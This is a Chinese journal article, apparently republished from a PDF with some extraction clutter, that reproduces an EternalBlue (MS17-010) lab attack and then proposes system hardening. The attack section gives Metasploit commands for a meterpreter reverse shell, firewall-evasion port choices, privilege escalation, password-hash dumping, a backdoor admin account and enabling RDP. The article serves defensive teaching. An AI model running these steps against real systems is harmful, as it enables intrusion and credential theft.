61
《广播电视网络》  2021年第2期  总第374期
免费永久的linux服务器1  引言
为满足当前广电业务不断融合发展的需要,虚拟化、云平台、大数据系统、IP 化播出前端和制作中心等设备和应用相继投入使用。与此同时,网络安全面临越来越严重的挑战,大量系统和应用漏洞被发布与利用,其中以“永恒之蓝”漏洞最具代表性。
“永恒之蓝”利用Windows 操作系统SMB 服务漏洞获取系统的最高权限,对应微软公司编号MS17-010。不法分子通过改造“永恒之蓝”制作了WannaCry 病毒,该病毒利用Windows 操作系统445端口存在的漏洞进行传播,并且具有自我复制、主动传播性。被WannaCry 病毒入侵后,用户主机、服务器操作系统内的图片、文档、音频、视频、数据等都会被加密,并在桌面弹出对话框,要求受害者支付比特币作为赎金,才能解密并释放被加密的数据。时至今日,各种新型病毒不断涌现,攻击目标不再限于Windows 操作系统,Linux 操作系统也未能幸免,并且新型
病毒对攻击目标的选择越来越精准、隐蔽性越来越强,可以长期潜伏于受害者的内部网络中,当感染的主机和服务器达到一定数量后集中暴发,有的病毒甚至可以预判并删除备份数据,再加密当前运行数据,给企业和用户带来巨大的损失。基于以上原因,我们非常有必要了解“永恒之蓝”漏洞的攻击方式,从而加固防御系统。
2  信息收集阶段
使用NMAP 对局域网靶机进行扫
描,发现局域网内靶机开放端口445。
使用Nessus 对靶机进行扫描,扫描结果证明靶机存在MS17-010漏洞。
3  渗透攻击阶段
首先,在Kali Linux 中启动Metasploit Framework。
其次,寻“永恒之蓝”相关可利用模块。执行命令“msf 6 > search ms17-010”,发现存在扫描模块“auxiliary/scanner/smb/smb_ms17_010”和攻击模块“exploit/
基于“永恒之蓝”漏洞的 渗透攻击与系统安全加固
姜巍  天津广播电视网络有限公司
摘要:在广电网络多业务平台融合发展的大背景下,网络安全面临越来越严重的挑战。其中,
源于“永恒之蓝”漏洞的病毒经过几代变种,时至今日仍然危害巨大,甚至有愈演愈烈之势。本文首先复现了如何利用“永恒之蓝”漏洞进行渗透与攻击,最后基于病毒特点阐述了系统安全加固方案。
关键词:“永恒之蓝”  病毒  渗透攻击  系统加固
windows/smb/ms17_010_eternalblue”。
再次,按以下步骤利用攻击模块进行攻击。
(1)加载攻击模块[1]。执行命令“msf6 > use exploit/windows/smb/ ms17_010_eternalblue”。
(2)设置攻击模块参数。通过“show options”选项查看需要设置的参数。第一步,设置RHOSTS靶机IP地址为“10.103.46.145”。运行“msf6 exploit(windows/smb/ ms17_010_eternalblue) > set RHOSTS 10.103.46.145”。第二步,选择攻击负载payload,使用Windows的反弹shell。运行“msf6 exploit(windows/smb/ ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_ tcp”。第三步,设置LHOST监听主机地址为“10.103.47.173”,该地址为Kali Linux地址。运行“m s f6 e x p l o i t(w i n d o w s/s m b/ ms17_010_eternalblue) > s
et LHOST 10.103.47.173”。第四步,设置监听端口LPORT为8888(默认4444)。在实际情况下,此监听端口可以设置为
443或80来穿越防火墙,以避免8888
或4444一类端口被防火墙拦截。运行
“msf6 exploit(windows/smb/ms17_010_
eternalblue) > set LPORT 8888”。
(3)执行攻击。执行“exploit 或
者run”命令开始攻击。侦听机器获得
靶机反弹的meterpreter shell后,通过
“sysinfo” “ifconfig”命令查看主机
和IP地址信息,至此成功攻入靶机。
4  后渗透攻击阶段
4.1  提权并获取管理员密码
(1)通过“getsystem”命令获取
管理员权限[2]。
(2)通过“hashdump -i”命令
获取帐户与密码。获得用户Andy的密
码,但为哈希密文,通过互联网撞库
进行破解。
4.2  创建用户并开启远程桌面服务
通过“shell”命令切换到Windows
系统的shell下[3]。
(1)添加用户“hacker”,并归
入到“administrators”管理员用户组。
运行“C:\Windows\system32>net user 
hacker 123456 /add”“C:\Windows\
system32>net localgroup administrators 
hacker /add”。
(2)开启靶机远程桌面服务。
运行“meterpreter > run post/windows/
manage/enable_rdp”。
至此我们已完全控制靶机,并可
以通过上传病毒、添加克隆帐户、增
加开机启动项、防火墙开放端口等方
法留下永久后门,此处不再赘述。
5  系统安全加固
随着各种新型病毒的不断涌
现,病毒的攻击比以往更加凶猛,
给主机与数据安全带来重大挑战,企
业数据安全已经成为未来网络安全行
业最重要的关注方向。各种新型窃取
木马随着病毒一起下发,窃取企
业数据,通过“+窃取”两种方
式对企业的重要数据进行攻击,同时
针对云服务器、云数据、Linux系统的
病毒持续增多。
由于传统防御手段存在严重缺陷,
针对病毒的未来发展趋势,建议
建立从主机到系统、从网络流量到主
动发现的整体防御体系,以满足可视
化、自动化需求,从而大大降低维护
难度,缩短应急处理时间,将对数据
与系统的危害降至最低。针对上述勒
索病毒的发展趋势,建议采取以下具
体安全加固方案。
5.1  主机安全加固
(1)定期对操作系统与应用软件
进行漏洞扫描,及时更新补丁或升级
应用软件,密切关注漏洞平台发布的
预警信息。
62《广播电视网络》  2021年第2期  总第374期
63
《广播电视网络》  2021年第2期  总第374期
(2)开启操作系统自带防火墙,开放业务端口。在局域网安全中,操作系统自带防火墙作为最后一道防线发挥着非常重要的作用,可以阻拦大部分木马、蠕虫、病毒与入侵者的渗透和攻击。对于重要数据,服务器应开启防火墙双向访问控制策略,不仅要控制入方向访问,而且要控制出方向访问,避免木马程序开启反弹shell 或者从互联网下载病毒程序。
(3)定期进行弱口令检查,设置连续输入密码错误,锁定帐户或封禁该IP 继续登录,防止暴力破解。Liunx 操作系统可以通过结合使用防火墙+Fail2ban,防止暴力破解。
(4)定期检查特殊帐户,删除或禁用过期、临时、克隆、空口令帐户。
(5)开启日志审计功能,用户日志保存至少六个月。
(6)安装基于主机的入侵检测系统
[4]
或杀毒软件。
5.2  部署安全态势感知系统
类似于挖矿病毒,新型病毒一般会在内部网络潜伏3~6个月,持
续横向探索内部网络,当感染主机达到一定数量时集中爆发。这对内网流量威胁检测提出了新的要求。同时,由于内部网络主机数量较多,导致调查运营消耗大量的时间和人力。我们可以部署安全态势感知系统,通过潜伏威胁探针对主机和内网流量进行安全检测与流量审计。
如图1所示,潜伏威胁探针作为流量采集设备,主要与交换机等具备旁路镜像功能的汇聚设备对接,处理镜像流量和输出数据。
探针能够自动识别内部服务器,并且自动发现服务器开放端口、存在的漏洞、弱密码等风险。对于病毒、蠕虫、木马后门、拒绝服务攻击、终端攻击、扫描攻击、SQL 注入、XSS、缓冲区溢出、欺骗劫持等攻击威胁具
有高精度的检测能力。
安全态势感知平台部署在内网,可以集中管理部署在各个位置的探针,收集探针抓取的日志,分析异常行为,可视化展示访问关系、可疑访问和攻击行为,第一时间定位病毒或者恶意攻击,快速处理或者隔离相应服务器
图1  探针对流量的处理流程示意图
或主机以避免病毒感染更多的主机和数据。
5.3  数据备份与恢复
遭到病毒攻击时,数据备份十分重要,企业重要数据应选择异地备份,主用系统与异地备份系统之间的链路应该部署安全隔离设备,确保异地备份数据不受入侵。
当主用数据被病毒感染时,应迅速断开与异地备份系统的连接,确认病毒被清理干净后才可进行数据恢复操作,避免备份数据同时被病毒感染,造成不可恢复的重大损失。同时,还应建立健全数据备份与恢复管理制度,定期进行数据恢复演练,确保备份数据的可用性和完整性。
6  结束语
网络环境的复杂性、多变性、以及信息系统的脆弱性,决定了网络安全威胁的客观存在。近年来,新型病毒频繁攻击教育、医疗、汽车等行业,造成重大经济损失和不良影响。处于转型期的广电网络,在积极拥抱互联网的同时,需将网络安全放在首位,把安全实现互联网融合发展作为持续探究的课题。
参考文献
[1]闵海钊,李合鹏,刘学伟等.网络安全攻防技术实战[M].北京:电子工业出版社,2020,(10):253.
[2]Archer 译.Lee Allen,Tedi Heriyanto. Kali Linux 渗透测试的艺术[M].北京:人民邮电出版社,2017,(5):239.
[3]大学霸IT 达人,从实践中学习Metasploit5渗透测试[M].北京:机械工业出版社2019(7):201.[4]吴礼发,洪征,李华波.网络攻防原理与技术[M].
北京:电子工业出版社, 2019,(9):295.RTN

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。